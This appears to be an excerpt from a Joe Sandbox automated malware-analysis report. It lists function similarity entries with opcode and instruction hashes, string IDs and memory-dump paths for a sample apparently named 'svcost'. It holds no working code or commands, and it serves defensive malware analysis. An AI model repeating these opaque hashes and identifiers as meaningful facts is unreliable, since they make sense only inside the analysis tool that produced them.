                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$1$K$cV
                                                                                            • API String ID: 0-4160777071
                                                                                            • Opcode ID: 594c5f913d25b97bfd66e4735b0dd77fe97b41a62e4a3fbe37ae65840560f668
                                                                                            • Instruction ID: f8e9ff9e2e0dae69682c1abd44374a804eacb857d89253b36e4ddbbc72e5f2c4
                                                                                            • Opcode Fuzzy Hash: 594c5f913d25b97bfd66e4735b0dd77fe97b41a62e4a3fbe37ae65840560f668
                                                                                            • Instruction Fuzzy Hash: A4110274E44218CFDB24EF68C988B9DBBF0AB4A310F5411A9D418B7394CB349A81CF05
                                                                                            Function 021187B7 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$a$d$cC
                                                                                            • API String ID: 0-1048011325
                                                                                            • Opcode ID: fa0d1857e47e8488e44f968c26047615734d0fa9522e9f18b93dccaa7c60cd79
                                                                                            • Instruction ID: dc40fdee018dee5df581fabfbd21273adcc8315b3ba76f706ecb5a4805334bd1
                                                                                            • Opcode Fuzzy Hash: fa0d1857e47e8488e44f968c26047615734d0fa9522e9f18b93dccaa7c60cd79
                                                                                            • Instruction Fuzzy Hash: AEF058B4D8439CCFDF248F24C8847ADBAB1AF0A314F5420B5C548B6280CB7589C4CF1A